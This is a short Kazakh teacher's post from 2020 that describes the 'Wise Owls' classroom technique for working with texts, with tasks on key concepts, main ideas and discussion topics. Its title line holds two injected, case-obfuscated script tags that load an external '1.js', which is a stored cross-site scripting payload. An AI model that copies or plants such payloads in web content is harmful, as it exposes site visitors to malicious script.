Данышпан үкілер<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
22.10.2020
Әр сабақ сайын оқушылардың қызығушылығын арттыру үшін жаңа әдіс- тәсілдер қолдануға тырысамыз. Бүгін «Данышпан үкілер» атты тәсілді ұсынамын.
- Мәтінмен жұмыс істеудің негіздері.
Мәтіннен негізгі (жаңа) ұғымдарды тауып, оларды алфавиттік ретте жазыңыз. Мәтіннен сіз күтпеген, сіздің бұрынғы ұғымдарыңызға қарсы тұрған ақпаратты табыңыз. Сізге жаңалық болған ақпаратты жазыңыз.
- Маңызды өмірлік даналық.
Мәтіннің негізгі ойын бір сөйлеммен білдіріңіз.
- Таныс және таныс емес.
Мәтіннен сізге алдында таныс болған және мүлдем таныс емес ақпаратты табыңыз.
- Иллюстрациялық бейнелеу.
Мәтіннің негізгі ойын сурет, сызба, карикатура т.б. арқылы бейнелеп көріңіз.
- Үлгі боларлық қорытынды.
Оқыған мәтіннен келешекте қажет болатын маңызды қорытынды шығаруға бола ма?
- Талқылауға арналған маңызды тақырыптар.
Сыныпта талқылауға тұрарлықтай, ерекше көңіл бөлуге болатын ойларды, пікірлерді табыңдар. Бұл тәсіл оқушылар белсенді жұмыс істеуі үшін өте қолайлы деп ойлаймын.
Садвакасова Г.С.